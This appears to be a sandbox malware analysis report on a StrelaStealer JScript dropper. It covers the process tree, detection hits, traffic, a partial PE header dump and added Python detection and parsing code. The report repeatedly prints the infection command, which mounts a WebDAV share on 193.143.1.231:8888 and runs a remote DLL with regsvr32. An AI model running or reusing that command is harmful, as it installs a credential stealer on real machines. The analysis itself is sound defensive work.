Windows Analysis Report
126484723232027823.js

Overview

General Information

Sample name: 126484723232027823.js
Analysis ID: 1576785
MD5: 09024cb4c452f96fe5b6045e198092ba
SHA1: 53f924039e79576a5b2e9b90e3c11c1116e933eb
SHA256: 0ff304716b215d4fadbf9fee1be5d717c454a09f6bdbe6e42e29995d969964e8
Tags: js, StrelaStealer, user-lowmal3

Detection

Strela Downloader, Strela Stealer
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

JScript performs obfuscated calls to suspicious functions
Yara detected Strela Downloader
Yara detected Strela Stealer
Gathers information about network shares
Opens network shares
Sigma detected: WScript or CScript Dropper
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains functionality to query locales information (e.g. system language)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Cscript/Wscript Potentially Suspicious Child Process
Sigma detected: Scripting/CommandLine Process Spawned Regsvr32
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6672 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\126484723232027823.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 6948 cmdline: "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6548 cmdline: cmd /c net use \\193.143.1.231@8888\davwwwroot\ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • net.exe (PID: 3944 cmdline: net use \\193.143.1.231@8888\davwwwroot\ MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
      • cmd.exe (PID: 1020 cmdline: cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • regsvr32.exe (PID: 5640 cmdline: regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
  • cleanup
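The tree above is the whole infection chain: Windows Script Host spawns cmd.exe, cmd.exe mounts a WebDAV share on TCP/8888 through the \\host@port\davwwwroot\ UNC form that the WebDAV Mini-Redirector understands, and regsvr32 /s is then pointed at a DLL on that share, so the payload never has to be written to disk by the script itself. The block below is an added detection example written for this report, not Joe Sandbox or Sigma code. The process events are constructed from the tree above, and the record layout (pid, ppid, image, cmdline) is an assumption about whatever Sysmon or EDR export would feed it; the reason strings and the non-standard-port rule (anything other than 80/443) are this example's own choices.

```python
"""Detection logic for the execution chain in this report: a Windows Script
Host process spawning cmd.exe, which mounts a WebDAV share on a non-standard
port (\\host@port\davwwwroot\) with net use and hands a DLL on that share to
regsvr32 /s. Added example, not Joe Sandbox or Sigma code; the events below are
constructed from the report's process tree."""
import re
from dataclasses import dataclass

# UNC forms the Windows WebDAV Mini-Redirector accepts:
#   \\host@port\davwwwroot\path      -> http://host:port/path
#   \\host@SSL@port\davwwwroot\path  -> https://host:port/path
WEBDAV_UNC = re.compile(
    r"\\\\(?P<host>[A-Za-z0-9.\-]+)(?P<ssl>@SSL)?@(?P<port>\d{1,5})"
    r"\\davwwwroot\\(?P<path>[^\s\"&|]*)",
    re.IGNORECASE,
)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


@dataclass(frozen=True)
class ProcEvent:          # assumed record layout of the process-creation feed
    pid: int
    ppid: int
    image: str            # lower-case file name of the executable
    cmdline: str


def webdav_targets(cmdline):
    """Every WebDAV UNC in a command line as (host, port, path, uses_tls)."""
    return [(m["host"], int(m["port"]), m["path"], m["ssl"] is not None)
            for m in WEBDAV_UNC.finditer(cmdline)]


def ancestry(events, pid):
    """Image names from the given process up to the last parent we have an event for."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid].image)
        pid = by_pid[pid].ppid
    return chain


def detect(events):
    """One finding per (process, WebDAV target) that matches part of the chain."""
    findings = []
    for e in events:
        for host, port, path, uses_tls in webdav_targets(e.cmdline):
            chain = ancestry(events, e.pid)
            reasons = []
            if port not in (80, 443):
                reasons.append(f"WebDAV on non-standard port {port}")
            if e.image == "net.exe" and e.cmdline.lower().startswith("net use"):
                reasons.append("net use mounting a WebDAV share")
            if e.image == "regsvr32.exe" and path.lower().endswith(".dll"):
                reasons.append("regsvr32 loading a DLL straight from WebDAV")
            if SCRIPT_HOSTS & set(chain[1:]):
                reasons.append("descends from Windows Script Host")
            if reasons:
                findings.append({"pid": e.pid, "image": e.image, "host": host,
                                 "port": port, "path": path, "tls": uses_tls,
                                 "chain": chain, "reasons": reasons})
    return findings


def staging_hosts(findings):
    """Distinct (host, port) pairs to block and hunt for across the fleet."""
    return sorted({(f["host"], f["port"]) for f in findings})


# Constructed from the process tree in this report.
SAMPLE_EVENTS = [
    ProcEvent(6672, 1028, "wscript.exe",
              'C:\\Windows\\System32\\WScript.exe "C:\\Users\\user\\Desktop\\126484723232027823.js"'),
    ProcEvent(6948, 6672, "cmd.exe",
              '"C:\\Windows\\System32\\cmd.exe" /c cmd /c net use \\\\193.143.1.231@8888\\davwwwroot\\'
              '&&cmd /c regsvr32 /s \\\\193.143.1.231@8888\\davwwwroot\\140341625623863.dll'),
    ProcEvent(5664, 6948, "conhost.exe", "C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(6548, 6948, "cmd.exe", "cmd /c net use \\\\193.143.1.231@8888\\davwwwroot\\"),
    ProcEvent(3944, 6548, "net.exe", "net use \\\\193.143.1.231@8888\\davwwwroot\\"),
    ProcEvent(1020, 6948, "cmd.exe",
              "cmd /c regsvr32 /s \\\\193.143.1.231@8888\\davwwwroot\\140341625623863.dll"),
    ProcEvent(5640, 1020, "regsvr32.exe",
              "regsvr32 /s \\\\193.143.1.231@8888\\davwwwroot\\140341625623863.dll"),
]

if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for f in hits:
        print(f["pid"], f["image"], "|", " <- ".join(f["chain"]), "|", "; ".join(f["reasons"]))
    print("staging hosts:", staging_hosts(hits))
```

Running it over the constructed events yields six findings (two for the outer cmd.exe, whose command line carries both UNCs) and a single staging host, 193.143.1.231:8888. The parent walk stops at PID 1028 because no event for it is in the sample, which is also why the regsvr32 finding's chain reads regsvr32.exe <- cmd.exe <- cmd.exe <- wscript.exe rather than reaching explorer.exe.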
No configs have been found
Source | Rule | Description | Author
0000000B.00000002.2209329233.0000000002201000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_StrelaStealer | Yara detected Strela Stealer | Joe Security
0000000B.00000002.2209539224.00007FF8B7E10000.00000004.00000001.01000000.00000007.sdmp | JoeSecurity_StrelaStealer | Yara detected Strela Stealer | Joe Security
Process Memory Space: wscript.exe PID: 6672 | JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security
Process Memory Space: regsvr32.exe PID: 5640 | JoeSecurity_StrelaStealer | Yara detected Strela Stealer | Joe Security
11.2.regsvr32.exe.7ff8b7e00000.0.unpack | JoeSecurity_StrelaStealer | Yara detected Strela Stealer | Joe Security
amsi64_6672.amsi.csv | JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security

              System Summary

Source: Process started. Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community. Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\126484723232027823.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\126484723232027823.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\126484723232027823.js", ProcessId: 6672, ProcessName: wscript.exe
Source: Network Connection. Author: Florian Roth (Nextron Systems). Data: DestinationIp: 193.143.1.231, DestinationIsIpv6: false, DestinationPort: 8888, EventID: 3, Image: C:\Windows\System32\net.exe, Initiated: true, ProcessId: 3944, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704
Source: Process started. Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'). Data: Command: "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\126484723232027823.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6672, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll, ProcessId: 6948, ProcessName: cmd.exe
Source: Process started. Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems). Data: Command: regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll, CommandLine: regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1020, ParentProcessName: cmd.exe, ProcessCommandLine: regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll, ProcessId: 5640, ProcessName: regsvr32.exe
Source: Process started. Author: Michael Haag. Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\126484723232027823.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\126484723232027823.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\126484723232027823.js", ProcessId: 6672, ProcessName: wscript.exe
Source: Process started. Author: frack113. Data: Command: net use \\193.143.1.231@8888\davwwwroot\, CommandLine: net use \\193.143.1.231@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: cmd /c net use \\193.143.1.231@8888\davwwwroot\, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6548, ParentProcessName: cmd.exe, ProcessCommandLine: net use \\193.143.1.231@8888\davwwwroot\, ProcessId: 3944, ProcessName: net.exe
Source: Process started. Author: Nasreddine Bencherchali (Nextron Systems). Data: Command: net use \\193.143.1.231@8888\davwwwroot\, CommandLine: net use \\193.143.1.231@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: cmd /c net use \\193.143.1.231@8888\davwwwroot\, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6548, ParentProcessName: cmd.exe, ProcessCommandLine: net use \\193.143.1.231@8888\davwwwroot\, ProcessId: 3944, ProcessName: net.exe
              No Suricata rule has matched


              Networking

Source: unknown. Network traffic detected: HTTP traffic on port 49704 -> 8888
Source: unknown. Network traffic detected: HTTP traffic on port 8888 -> 49704
Source: unknown. Network traffic detected: HTTP traffic on port 49705 -> 8888
Source: unknown. Network traffic detected: HTTP traffic on port 8888 -> 49705
Source: unknown. Network traffic detected: HTTP traffic on port 8888 -> 49706
Source: unknown. Network traffic detected: HTTP traffic on port 8888 -> 49707
Source: unknown. Network traffic detected: HTTP traffic on port 8888 -> 49708
Source: unknown. Network traffic detected: HTTP traffic on port 49709 -> 8888
Source: unknown. Network traffic detected: HTTP traffic on port 8888 -> 49709
Source: global traffic. TCP traffic: 192.168.2.5:49704 -> 193.143.1.231:8888
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Tue, 17 Dec 2024 14:16:14 GMTContent-Type: application/octet-streamContent-Length: 418816Connection: keep-aliveAccept-Ranges: bytesEtag: "1811fc5bc5a4e37266400"Last-Modified: Tue, 17 Dec 2024 14:13:22 GMTData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 04 00 19 51 61 67 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 00 00 d2 00 00 00 8e 05 00 00 00 00 00 f0 12 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 06 00 00 04 00 00 00 00 00 00 02 00 60 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 f0 00 00 57 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 06 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 11 d1 00 00 00 10 00 00 00 d2 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 78 00 00 00 00 f0 00 00 00 02 00 00 00 d6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 84 88 05 00 00 00 01 00 00 8a 05 00 00 d8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 18 00 00 00 00 90 06 00 00 02 00 00 00 62 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
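The response body above begins with a PE image, which is what the "Downloads executable code via HTTP" signature keys on. The block below is an added example, not Joe Sandbox code: it decodes the first 0x220 bytes of that dump (re-laid here in 16-byte rows; the rest of the body is not reproduced) into the fields that matter for triage and checks the section table against the Content-Length the server advertised. The returned dict's field names and the triage wording in assess() are this example's own.

```python
"""Parse the PE header at the start of the HTTP response captured in this
report (the 140341625623863.dll download) and cross-check it against the
advertised Content-Length. Added example, not Joe Sandbox code. RESPONSE_HEAD
is the first 0x220 bytes of the 'Data Raw' dump, re-laid in 16-byte rows."""
import struct
from datetime import datetime, timezone

RESPONSE_HEAD = bytes.fromhex("".join(
    [
        "4d5a7800010000000400000000000000",  # 0x000 "MZ", e_cblp, e_cp, e_cparhdr ...
        "00000000000000004000000000000000",  # 0x010 e_lfarlc = 0x40
        "00000000000000000000000000000000",  # 0x020
        "00000000000000000000000078000000",  # 0x030 e_lfanew = 0x78
        "0e1fba0e00b409cd21b8014ccd215468",  # 0x040 DOS stub code, "Th"
        "69732070726f6772616d2063616e6e6f",  # 0x050 "is program canno"
        "742062652072756e20696e20444f5320",  # 0x060 "t be run in DOS "
        "6d6f64652e2400005045000064860400",  # 0x070 "mode.$", "PE\0\0", Machine, NumberOfSections
        "195161670000000000000000f0002220",  # 0x080 TimeDateStamp, ..., SizeOfOptionalHeader, Characteristics
        "0b020e0000d20000008e050000000000",  # 0x090 Magic 0x20b (PE32+), SizeOfCode, SizeOfInitializedData
        "f0120000001000000000008001000000",  # 0x0a0 AddressOfEntryPoint, BaseOfCode, ImageBase
        "00100000000200000600000000000000",  # 0x0b0 SectionAlignment, FileAlignment, OS/image versions
        "060000000000000000a0060000040000",  # 0x0c0 subsystem version, Win32Version, SizeOfImage, SizeOfHeaders
        "00000000020060000000100000000000",  # 0x0d0 CheckSum, Subsystem, DllCharacteristics, stack reserve
        "00100000000000000000100000000000",  # 0x0e0 stack commit, heap reserve
        "00100000000000000000000010000000",  # 0x0f0 heap commit, LoaderFlags, NumberOfRvaAndSizes = 16
        "00f00000570000000000000000000000",  # 0x100 export directory (RVA, size), import directory (empty)
        "00000000000000000090060018000000",  # 0x110 resource directory (empty), exception directory
    ]
    + ["00" * 16] * 6                         # 0x120-0x17f remaining twelve directories, all empty
    + [
        "2e7465787400000011d1000000100000",  # 0x180 .text
        "00d20000000400000000000000000000",  # 0x190
        "00000000200000602e72646174610000",  # 0x1a0 .text Characteristics, .rdata
        "7800000000f000000002000000d60000",  # 0x1b0
        "00000000000000000000000040000040",  # 0x1c0
        "2e646174610000008488050000000100",  # 0x1d0 .data
        "008a050000d800000000000000000000",  # 0x1e0
        "00000000400000c02e70646174610000",  # 0x1f0 .data Characteristics, .pdata
        "18000000009006000002000000620600",  # 0x200
        "00000000000000000000000040000040",  # 0x210
    ]
))
CONTENT_LENGTH = 418816  # from the response headers in the report

IMAGE_FILE_DLL = 0x2000
MACHINE_NAMES = {0x14C: "x86", 0x8664: "x64", 0xAA64: "arm64"}
DIRECTORY_NAMES = ["export", "import", "resource", "exception", "security",
                   "basereloc", "debug", "architecture", "globalptr", "tls",
                   "load_config", "bound_import", "iat", "delay_import",
                   "com_descriptor", "reserved"]


def parse_pe_header(data):
    """Decode DOS header, COFF header, PE32+ optional header and section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature at e_lfanew")
    coff = e_lfanew + 4
    machine, nsections, timestamp, _, _, opt_size, characteristics = \
        struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic != 0x20B:
        raise ValueError(f"only PE32+ is handled here, magic={magic:#x}")
    entry_point = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    size_of_image = struct.unpack_from("<I", data, opt + 56)[0]
    subsystem, dll_characteristics = struct.unpack_from("<HH", data, opt + 68)
    n_dirs = struct.unpack_from("<I", data, opt + 108)[0]
    directories = {}
    for i in range(min(n_dirs, len(DIRECTORY_NAMES))):
        rva, size = struct.unpack_from("<II", data, opt + 112 + 8 * i)
        if rva or size:
            directories[DIRECTORY_NAMES[i]] = (rva, size)
    sections = []
    for i in range(nsections):
        name, vsize, va, raw_size, raw_ptr, _, _, _, _, flags = \
            struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii"), "va": va,
                         "vsize": vsize, "raw_ptr": raw_ptr, "raw_size": raw_size,
                         "flags": flags})
    return {
        "machine": machine,
        "is_dll": bool(characteristics & IMAGE_FILE_DLL),
        "timestamp_utc": datetime.fromtimestamp(timestamp, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
        "entry_point": entry_point, "image_base": image_base,
        "size_of_image": size_of_image, "subsystem": subsystem,
        "dll_characteristics": dll_characteristics,
        "directories": directories, "sections": sections,
    }


def expected_file_size(info):
    """End of the last section's raw data: the size a complete file must have."""
    return max(s["raw_ptr"] + s["raw_size"] for s in info["sections"])


def assess(info, content_length):
    """Triage notes a practitioner would want before detonating the file."""
    arch = MACHINE_NAMES.get(info["machine"], hex(info["machine"]))
    notes = [f"{arch} {'DLL' if info['is_dll'] else 'EXE'}, linked {info['timestamp_utc']} UTC"]
    if "import" not in info["directories"]:
        notes.append("no import directory: APIs are resolved at runtime, typical of packed or loader code")
    data = next((s for s in info["sections"] if s["name"] == ".data"), None)
    if data and data["raw_size"] * 2 > content_length:
        notes.append(f".data holds {data['raw_size']:#x} of {content_length:#x} bytes: likely an embedded payload")
    size = expected_file_size(info)
    notes.append("Content-Length matches the section table" if size == content_length
                 else f"Content-Length {content_length} != expected {size}: truncated or padded")
    return notes


if __name__ == "__main__":
    info = parse_pe_header(RESPONSE_HEAD)
    for s in info["sections"]:
        print(f"{s['name']:8} va={s['va']:#08x} raw={s['raw_ptr']:#08x}+{s['raw_size']:#x} flags={s['flags']:#010x}")
    for note in assess(info, CONTENT_LENGTH):
        print("-", note)
```

What the captured header tells you: the file is a 64-bit DLL (Characteristics 0x2022 carries IMAGE_FILE_DLL, consistent with regsvr32 /s and with the 7FF8B7E10000 region in the Yara hits), its link timestamp decodes to 2024-12-17 10:23:21 UTC, about four hours before the Last-Modified the nginx server reports, it has an export directory but no import directory, .data accounts for 0x58a00 of the 0x66400 bytes, and the section table ends at exactly 418816 bytes, so the advertised Content-Length covers a complete image rather than a truncated one.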
Source: Joe Sandbox View. ASN Name: BITWEB-ASRU
Source: unknown. TCP traffic detected without corresponding DNS query: 193.143.1.231 (50 occurrences)
Source: global traffic. HTTP traffic detected: GET /140341625623863.dll HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045
translate: f
Host: 193.143.1.231:8888
Source: net.exe, 00000005.00000002.2130413282.00000178B0F71000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: http://193.143.1.231/
Source: net.exe, 00000005.00000002.2130413282.00000178B0F95000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000003.2050785619.00000178B0F37000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000003.2049998000.00000178B0F5D000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000002.2130413282.00000178B0F71000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: http://193.143.1.231:8888/
Source: net.exe, 00000005.00000003.2050785619.00000178B0F37000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: http://193.143.1.231:8888/%=1
Source: net.exe, 00000005.00000003.2050785619.00000178B0F37000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: http://193.143.1.231:8888/-=9
Source: net.exe, 00000005.00000002.2130413282.00000178B0F71000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: http://193.143.1.231:8888//
Source: net.exe, 00000005.00000003.2050785619.00000178B0F37000.00000004.00000020.00020000.00000000.sdmp. String found in binary or memory: http://193.143.1.231:8888/y=M

              Spam, unwanted Advertisements and Ransom Demands

Source: Yara match. File source: amsi64_6672.amsi.csv, type: OTHER
Source: Yara match. File source: Process Memory Space: wscript.exe PID: 6672, type: MEMORYSTR

              System Summary

Source: C:\Windows\System32\wscript.exe. COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\regsvr32.exe. Code function: 11_2_02209A30
Source: C:\Windows\System32\regsvr32.exe. Code function: 11_2_0220BDB0
Source: C:\Windows\System32\regsvr32.exe. Code function: 11_2_0223DA00
Source: C:\Windows\System32\regsvr32.exe. Code function: 11_2_02242B28
Source: C:\Windows\System32\regsvr32.exe. Code function: 11_2_02236F30
Source: C:\Windows\System32\regsvr32.exe. Code function: 11_2_0223A391
Source: C:\Windows\System32\regsvr32.exe. Code function: 11_2_022498E8
Source: C:\Windows\System32\regsvr32.exe. Code function: 11_2_022429A4
Source: 126484723232027823.js. Initial sample: Strings found which are bigger than 50
Source: classification engine. Classification label: mal84.rans.troj.spyw.evad.winJS@12/0@0/1
Source: C:\Windows\System32\conhost.exe. Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5664:120:WilError_03
Source: C:\Windows\System32\wscript.exe. File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe. Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown. Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\126484723232027823.js"
Source: C:\Windows\System32\wscript.exe. Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll
Source: C:\Windows\System32\cmd.exe. Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe. Process created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\
Source: C:\Windows\System32\cmd.exe. Process created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\
Source: C:\Windows\System32\cmd.exe. Process created: C:\Windows\System32\cmd.exe cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll
Source: C:\Windows\System32\cmd.exe. Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll
Source: C:\Windows\System32\wscript.exe. Sections loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, jscript.dll, iertutil.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mpr.dll, scrrun.dll, windows.storage.dll, propsys.dll, edputil.dll, urlmon.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\net.exe. Sections loaded: mpr.dll, wkscli.dll, netutils.dll, samcli.dll, srvcli.dll, iphlpapi.dll, drprov.dll, winsta.dll, ntlanman.dll, davclnt.dll, davhlpr.dll, winhttp.dll, ondemandconnroutehelper.dll, dhcpcsvc6.dll, dhcpcsvc.dll, webio.dll, mswsock.dll, winnsi.dll, sspicli.dll, wininet.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, urlmon.dll
Source: C:\Windows\System32\cmd.exe. Section loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exe. Sections loaded: apphelp.dll, aclayers.dll, sfc.dll, sfc_os.dll, kernel.appcore.dll, uxtheme.dll, wininet.dll, textshaping.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, coremessaging.dll, wintypes.dll, wintypes.dll, wintypes.dll
